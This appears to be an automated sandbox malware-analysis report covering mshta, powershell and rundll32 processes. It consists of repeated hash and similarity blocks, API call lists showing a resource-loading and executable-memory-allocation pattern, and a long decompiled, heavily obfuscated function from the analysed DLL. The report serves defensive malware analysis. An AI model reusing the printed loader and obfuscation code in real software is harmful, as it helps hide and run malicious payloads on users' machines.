
Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3170000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction ID: 401eedc404b02ab99eeb0cd1a9e60cf9481d319fa7ed664bb6691d89b424bd4f
Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03170F21 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418908572.0000000003170000.00000010.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3170000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction ID: 401eedc404b02ab99eeb0cd1a9e60cf9481d319fa7ed664bb6691d89b424bd4f
Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03170F51 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418908572.0000000003170000.00000010.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3170000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction ID: 401eedc404b02ab99eeb0cd1a9e60cf9481d319fa7ed664bb6691d89b424bd4f
Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03170F41 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418908572.0000000003170000.00000010.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3170000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction ID: 401eedc404b02ab99eeb0cd1a9e60cf9481d319fa7ed664bb6691d89b424bd4f
Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03170F49 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418908572.0000000003170000.00000010.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3170000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction ID: 401eedc404b02ab99eeb0cd1a9e60cf9481d319fa7ed664bb6691d89b424bd4f
Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03170F71 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418908572.0000000003170000.00000010.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3170000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction ID: 401eedc404b02ab99eeb0cd1a9e60cf9481d319fa7ed664bb6691d89b424bd4f
Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03170F79 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418908572.0000000003170000.00000010.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3170000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction ID: 401eedc404b02ab99eeb0cd1a9e60cf9481d319fa7ed664bb6691d89b424bd4f
Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03170F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418908572.0000000003170000.00000010.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3170000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction ID: 401eedc404b02ab99eeb0cd1a9e60cf9481d319fa7ed664bb6691d89b424bd4f
Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03170F89 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418908572.0000000003170000.00000010.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3170000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction ID: 401eedc404b02ab99eeb0cd1a9e60cf9481d319fa7ed664bb6691d89b424bd4f
Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03170FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.418908572.0000000003170000.00000010.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3170000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction ID: 401eedc404b02ab99eeb0cd1a9e60cf9481d319fa7ed664bb6691d89b424bd4f
Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 2908, Parent PID: 2564COMMON

Executed Functions

Function 000007FF00280A21 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.687032337.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff00280000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59e6fe0bc7f2c06810ea187f0d142d0601af1c9f9156a03d47816ba4dd4a0673
Instruction ID: e7fe643f78d14a6782f32ef397af7fd9009983a94ddb73c4c6a7ccb5493132ad
Opcode Fuzzy Hash: 59e6fe0bc7f2c06810ea187f0d142d0601af1c9f9156a03d47816ba4dd4a0673
Instruction Fuzzy Hash: 9271692150EBC64FE74397785CA9AA07FF0AF17210B0A05EBD488CB0F3D9589D5AC762

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF002808A5 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.687032337.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff00280000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7b891409efc6e9cfdff1933070f8e21650cf4d12c613d0e2e18b59d50cb8ee6
Instruction ID: e1f3cbddfb22406e9ce63f6ecfd17094fee3f7ad52f67b6ce15ea0104089127b
Opcode Fuzzy Hash: d7b891409efc6e9cfdff1933070f8e21650cf4d12c613d0e2e18b59d50cb8ee6
Instruction Fuzzy Hash: 5741DD21A4E7C28FD74797785CA66A03FB0AF17210B4E05E7D488CF0B3E5589D9AC762

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 236, Parent PID: 2656COMMON

Execution Graph

Execution Coverage:	16.1%
Dynamic/Decrypted Code Coverage:	16.2%
Signature Coverage:	21.9%
Total number of Nodes:	297
Total number of Limit Nodes:	23

Executed Functions

Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C

_printf.LIBCMT ref: 1001265F
FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
_malloc.LIBCMT ref: 100127F5

Strings

DASHBOARD, xrefs: 1001267C
6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0, xrefs: 10012802
l, xrefs: 10012715
l, xrefs: 1001272D
3, xrefs: 100126D9
l, xrefs: 100126F7
e, xrefs: 100126CD
l, xrefs: 100126D3
., xrefs: 10012721
l, xrefs: 100126F1
., xrefs: 100126E5
kre3.l, xrefs: 10012748, 1001274B
ndldl, xrefs: 10012757, 1001275A
l, xrefs: 10012733
d, xrefs: 100126EB
l, xrefs: 1001271B
n, xrefs: 100126C7
d, xrefs: 10012727
2, xrefs: 100126DF

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
API String ID: 572389289-2839844625
Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1

SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 007AF8FD Relevance: 11.6, Strings: 9, Instructions: 353
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E007AF8FD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed short* _t368;
				signed int _t381;
				signed int* _t383;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t405;
				signed int* _t438;
				void* _t439;
				signed short* _t445;
				signed int* _t446;

				_t446 =  &_v1700;
				_v1636 = 0x636551;
				_t2 =  &_v1636; // 0x636551
				_t385 = 0x5e;
				_v1636 =  *_t2 / _t385;
				_t383 = 0;
				_t386 = 0x7a;
				_t439 = 0x12dab9f;
				_v1636 = _v1636 * 0x55;
				_v1636 = _v1636 ^ 0x0059e0ec;
				_v1616 = 0x84ec4b;
				_v1616 = _v1616 + 0xffff958e;
				_v1616 = _v1616 << 6;
				_v1616 = _v1616 ^ 0x212f9cfc;
				_v1624 = 0x57c2af;
				_v1624 = _v1624 / _t386;
				_v1624 = _v1624 >> 0xa;
				_v1624 = _v1624 ^ 0x000a9340;
				_v1676 = 0x94d6a3;
				_v1676 = _v1676 >> 3;
				_t387 = 0x41;
				_v1676 = _v1676 * 0x79;
				_v1676 = _v1676 * 0x68;
				_v1676 = _v1676 ^ 0x9280c2f7;
				_v1644 = 0x578290;
				_v1644 = _v1644 | 0x80e552f7;
				_v1644 = _v1644 + 0xffffd80b;
				_v1644 = _v1644 ^ 0x80feae5e;
				_v1652 = 0x70c956;
				_v1652 = _v1652 ^ 0x31ba76f8;
				_v1652 = _v1652 ^ 0x87f2510e;
				_v1652 = _v1652 ^ 0xb63594c0;
				_v1696 = 0x39dcdb;
				_v1696 = _v1696 * 0x22;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 * 0x75;
				_v1696 = _v1696 ^ 0x000247c6;
				_v1572 = 0x793846;
				_v1572 = _v1572 + 0xfc60;
				_v1572 = _v1572 ^ 0x007fa213;
				_v1576 = 0x3629f6;
				_v1576 = _v1576 | 0x7f6cc17b;
				_v1576 = _v1576 ^ 0x7f7c74a2;
				_v1600 = 0x630dc0;
				_v1600 = _v1600 | 0x8a3170d6;
				_v1600 = _v1600 ^ 0x8a7fe201;
				_v1664 = 0xe79625;
				_v1664 = _v1664 * 0x57;
				_v1664 = _v1664 ^ 0xe47ae09a;
				_v1664 = _v1664 + 0xffff598f;
				_v1664 = _v1664 ^ 0xaac0e7d1;
				_v1648 = 0xac147c;
				_v1648 = _v1648 << 4;
				_v1648 = _v1648 / _t387;
				_v1648 = _v1648 ^ 0x00264750;
				_v1588 = 0x745952;
				_t98 =  &_v1588; // 0x745952
				_v1588 =  *_t98 * 0x3a;
				_v1588 = _v1588 ^ 0x1a53f4d8;
				_v1672 = 0x57a21b;
				_t388 = 0x49;
				_v1672 = _v1672 / _t388;
				_t389 = 0x63;
				_v1672 = _v1672 / _t389;
				_v1672 = _v1672 | 0xd6f4ed27;
				_v1672 = _v1672 ^ 0xd6feee0f;
				_v1620 = 0xc904e8;
				_t390 = 0x17;
				_v1620 = _v1620 * 0x6d;
				_v1620 = _v1620 + 0x178d;
				_v1620 = _v1620 ^ 0x5592dda0;
				_v1688 = 0x59d198;
				_v1688 = _v1688 | 0x5938a823;
				_v1688 = _v1688 ^ 0x788d0eee;
				_v1688 = _v1688 + 0xffff1978;
				_v1688 = _v1688 ^ 0x21fe2fab;
				_v1612 = 0xa097a2;
				_v1612 = _v1612 << 9;
				_v1612 = _v1612 / _t390;
				_v1612 = _v1612 ^ 0x02dc2d90;
				_v1700 = 0xb7b4a0;
				_t391 = 0x36;
				_v1700 = _v1700 / _t391;
				_v1700 = _v1700 >> 1;
				_v1700 = _v1700 | 0xee164e4b;
				_v1700 = _v1700 ^ 0xee1e6de5;
				_v1680 = 0xe4ad14;
				_v1680 = _v1680 | 0xe839ddc8;
				_v1680 = _v1680 ^ 0xfe881b96;
				_t392 = 0x42;
				_v1680 = _v1680 * 0x4e;
				_v1680 = _v1680 ^ 0xd7ed2c6e;
				_v1656 = 0xa710a4;
				_v1656 = _v1656 + 0xfffff8f1;
				_v1656 = _v1656 ^ 0xcc5b21c1;
				_v1656 = _v1656 ^ 0xccf98fb8;
				_v1628 = 0x5fc40d;
				_v1628 = _v1628 + 0xb682;
				_v1628 = _v1628 << 6;
				_v1628 = _v1628 ^ 0x181c8c04;
				_v1640 = 0xd7aa78;
				_v1640 = _v1640 + 0x8e1d;
				_v1640 = _v1640 / _t392;
				_v1640 = _v1640 ^ 0x0007a72a;
				_v1580 = 0xbf48f6;
				_t393 = 0x25;
				_v1580 = _v1580 * 0xd;
				_v1580 = _v1580 ^ 0x09b7b49e;
				_v1564 = 0xff195;
				_v1564 = _v1564 + 0x8c1b;
				_v1564 = _v1564 ^ 0x00104e06;
				_v1684 = 0xbf1e83;
				_v1684 = _v1684 / _t393;
				_t394 = 0x77;
				_v1684 = _v1684 / _t394;
				_v1684 = _v1684 + 0xa662;
				_v1684 = _v1684 ^ 0x0006fc0d;
				_v1596 = 0xc39bae;
				_v1596 = _v1596 << 2;
				_v1596 = _v1596 ^ 0x030cfbaf;
				_v1568 = 0x66568e;
				_v1568 = _v1568 | 0x44ac0d6e;
				_v1568 = _v1568 ^ 0x44e9cf2b;
				_v1692 = 0x3d2b27;
				_v1692 = _v1692 + 0x3fae;
				_t395 = 0x71;
				_v1692 = _v1692 / _t395;
				_v1692 = _v1692 + 0xffff1a11;
				_v1692 = _v1692 ^ 0xffffbf57;
				_v1632 = 0xb4dfda;
				_v1632 = _v1632 * 9;
				_v1632 = _v1632 >> 3;
				_v1632 = _v1632 ^ 0x00c4553b;
				_v1584 = 0x206e7a;
				_v1584 = _v1584 << 7;
				_v1584 = _v1584 ^ 0x10371375;
				_v1592 = 0x689459;
				_v1592 = _v1592 + 0xffffb773;
				_v1592 = _v1592 ^ 0x00637077;
				_v1660 = 0x8b14df;
				_v1660 = _v1660 << 0xd;
				_v1660 = _v1660 + 0x9803;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 ^ 0x71eeeb6f;
				_v1608 = 0x8e767e;
				_v1608 = _v1608 | 0xfaf7fbb6;
				_v1608 = _v1608 ^ 0xfaf9bdf5;
				_v1668 = 0xccd677;
				_v1668 = _v1668 * 0x78;
				_v1668 = _v1668 + 0xffff6b3d;
				_v1668 = _v1668 + 0xf0ff;
				_v1668 = _v1668 ^ 0x600a3b9e;
				_v1604 = 0x7c05f9;
				_v1604 = _v1604 + 0xd55a;
				_v1604 = _v1604 ^ 0x007aedaa;
				_t445 = _v1604;
				while(_t439 != 0x12dab9f) {
					if(_t439 == 0x2f8e73a) {
						_push(_v1604);
						_push(_t383);
						_push(_t395);
						_push(_t383);
						_push(_t383);
						_push(_v1668);
						_push(_t445);
						E007AAB87(_v1660, _v1608, __eflags);
						_t383 = 1;
						__eflags = 1;
						L23:
						return _t383;
					}
					if(_t439 == 0x92208ae) {
						_t368 = _t445;
						__eflags =  *_t445 - _t383;
						if(__eflags == 0) {
							L18:
							_t439 = 0xeef82b0;
							continue;
						} else {
							goto L11;
						}
						do {
							L11:
							__eflags =  *_t368 - 0x2c;
							if( *_t368 != 0x2c) {
								goto L17;
							}
							_t438 =  &_v1560;
							while(1) {
								_t368 =  &(_t368[1]);
								_t405 =  *_t368 & 0x0000ffff;
								__eflags = _t405;
								if(_t405 == 0) {
									break;
								}
								__eflags = _t405 - 0x20;
								if(_t405 == 0x20) {
									break;
								}
								 *_t438 = _t405;
								_t438 =  &(_t438[0]);
								__eflags = _t438;
							}
							_t395 = 0;
							__eflags = 0;
							 *_t438 = 0;
							L17:
							_t368 =  &(_t368[1]);
							__eflags =  *_t368 - _t383;
						} while (__eflags != 0);
						goto L18;
					}
					if(_t439 == 0x99a67ee) {
						_t445 = E007AF899(_t395);
						_t439 = 0x92208ae;
						continue;
					}
					if(_t439 == 0x9e65a83) {
						_push(_v1612);
						_push(_v1636);
						_push(_v1688);
						_push( &_v520); // executed
						E007B46BB(_v1672, _v1620); // executed
						E007BDA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
						_push(_v1564);
						_push(_v1580);
						E007A47CE( &_v520, _v1684, _v1640, _v1596, _v1568, E007BDCF7(_v1640, 0x7a1140, __eflags),  &_v1040, _v1692, _v1632);
						_t395 = _v1584;
						E007AA8B0(_t395, _t375, _v1592);
						_t446 = _t446 - 0xc + 0x58;
						_t439 = 0x2f8e73a;
						continue;
					}
					_t457 = _t439 - 0xeef82b0;
					if(_t439 == 0xeef82b0) {
						_push(_v1696);
						_push(_v1652);
						_t381 = E007AB23C(_v1572, _v1576, E007BDCF7(_v1644, 0x7a10c0, _t457), _v1600, _v1664,  &_v1560); // executed
						_t395 = _v1648;
						asm("sbb edi, edi");
						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
						E007AA8B0(_t395, _t379, _v1588);
						_t446 =  &(_t446[7]);
					}
					L20:
					if(_t439 != 0xdf158d7) {
						continue;
					}
					goto L23;
				}
				E007A4B61( &_v1560, 0x208, _v1616, _v1624);
				_pop(_t395);
				_t439 = 0x99a67ee;
				goto L20;
			}

0x007af8fd
0x007af903
0x007af90d
0x007af917
0x007af91c
0x007af927
0x007af929
0x007af92c
0x007af931
0x007af935
0x007af93d
0x007af945
0x007af94d
0x007af952
0x007af95a
0x007af96a
0x007af96e
0x007af973
0x007af97b
0x007af983
0x007af98d
0x007af98e
0x007af997
0x007af99b
0x007af9a3
0x007af9ab
0x007af9b3
0x007af9bb
0x007af9c3
0x007af9cb
0x007af9d3
0x007af9db
0x007af9e3
0x007af9f0
0x007af9f4
0x007af9fe
0x007afa02
0x007afa0a
0x007afa15
0x007afa20
0x007afa2b
0x007afa36
0x007afa41
0x007afa4c
0x007afa54
0x007afa5c
0x007afa64
0x007afa71
0x007afa75
0x007afa7d
0x007afa85
0x007afa8d
0x007afa95
0x007afaa0
0x007afaa4
0x007afaac
0x007afab7
0x007afabf
0x007afac6
0x007afad1
0x007afae1
0x007afae6
0x007afaf0
0x007afaf5
0x007afafb
0x007afb03
0x007afb0b
0x007afb18
0x007afb1b
0x007afb1f
0x007afb27
0x007afb2f
0x007afb37
0x007afb3f
0x007afb47
0x007afb4f
0x007afb57
0x007afb5f
0x007afb6c
0x007afb70
0x007afb78
0x007afb84
0x007afb89
0x007afb8f
0x007afb93
0x007afb9b
0x007afba3
0x007afbab
0x007afbb3
0x007afbc0
0x007afbc3
0x007afbc7
0x007afbcf
0x007afbd7
0x007afbdf
0x007afbe7
0x007afbef
0x007afbf7
0x007afbff
0x007afc04
0x007afc0c
0x007afc14
0x007afc24
0x007afc28
0x007afc30
0x007afc43
0x007afc44
0x007afc4b
0x007afc56
0x007afc61
0x007afc6c
0x007afc77
0x007afc87
0x007afc91
0x007afc96
0x007afc9c
0x007afca4
0x007afcac
0x007afcb4
0x007afcb9
0x007afcc1
0x007afccc
0x007afcd7
0x007afce2
0x007afcea
0x007afcf6
0x007afcf9
0x007afcfd
0x007afd05
0x007afd0d
0x007afd1a
0x007afd1e
0x007afd23
0x007afd2b
0x007afd36
0x007afd3e
0x007afd49
0x007afd51
0x007afd59
0x007afd61
0x007afd69
0x007afd6e
0x007afd76
0x007afd7b
0x007afd83
0x007afd8b
0x007afd93
0x007afd9b
0x007afda8
0x007afdac
0x007afdb4
0x007afdbc
0x007afdc4
0x007afdcc
0x007afdd4
0x007afddc
0x007afde0
0x007afdf2
0x007affd1
0x007affd5
0x007affd6
0x007affd7
0x007affd8
0x007affd9
0x007affe8
0x007affe9
0x007afff3
0x007afff3
0x007afff7
0x007b0000
0x007b0000
0x007afdfe
0x007aff5e
0x007aff60
0x007aff64
0x007aff99
0x007aff99
0x00000000
0x00000000
0x00000000
0x00000000
0x007aff66
0x007aff66
0x007aff66
0x007aff6a
0x00000000
0x00000000
0x007aff6c
0x007aff81
0x007aff81
0x007aff84
0x007aff87
0x007aff8a
0x00000000
0x00000000
0x007aff75
0x007aff79
0x00000000
0x00000000
0x007aff7b
0x007aff7e
0x007aff7e
0x007aff7e
0x007aff8c
0x007aff8c
0x007aff8e
0x007aff91
0x007aff91
0x007aff94
0x007aff94
0x00000000
0x007aff66
0x007afe0a
0x007aff52
0x007aff54
0x00000000
0x007aff54
0x007afe16
0x007afe8f
0x007afe9a
0x007afe9e
0x007afead
0x007afeae
0x007afecf
0x007afed4
0x007afee0
0x007aff22
0x007aff2e
0x007aff37
0x007aff3c
0x007aff3f
0x00000000
0x007aff3f
0x007afe18
0x007afe1e
0x007afe24
0x007afe2d
0x007afe5e
0x007afe6a
0x007afe74
0x007afe7c
0x007afe82
0x007afe87
0x007afe87
0x007affc3
0x007affc9
0x00000000
0x00000000
0x00000000
0x007affcf
0x007affb7
0x007affbd
0x007affbe
0x00000000

Strings

Y, xrefs: 007AF935
F8y, xrefs: 007AFA0A
Qec, xrefs: 007AF90D
wpc, xrefs: 007AFD59
PG&, xrefs: 007AFAA4
oq, xrefs: 007AFD7B
zn , xrefs: 007AFD2B
RYt, xrefs: 007AFAB7
'+=, xrefs: 007AFCE2

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: '+=$F8y$PG&$Qec$RYt$oq$wpc$zn $Y
API String ID: 1514166925-3316477785
Opcode ID: 495cb419925381e1ff67042edbcb6c630e27138ba624e533a4879ed43b6cd5bc
Instruction ID: ba3f3b70b96ab42225e70f82a8673ddbce4cbc876e0985fd4f8b7e36bcfb85d2
Opcode Fuzzy Hash: 495cb419925381e1ff67042edbcb6c630e27138ba624e533a4879ed43b6cd5bc
Instruction Fuzzy Hash: 360220725083809FD368CF65C58AA5BFBE2BBC5718F108A1DF1D986260D7B98949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 007AE991 Relevance: 2.6, Strings: 2, Instructions: 68
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, char _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_v32 = _v32 & 0x00000000;
				_v44 = 0xa88528;
				_v40 = 0x811176;
				_v36 = 0xed2c64;
				_v20 = 0x893932;
				_v20 = _v20 ^ 0x2faf083b;
				_v20 = _v20 ^ 0x2f2d1c53;
				_v8 = 0xbe2d1;
				_t85 = 0x2e;
				_v8 = _v8 / _t85;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 + 0xffff961f;
				_v8 = _v8 ^ 0xfff451d0;
				_v16 = 0x50855f;
				_v16 = _v16 >> 8;
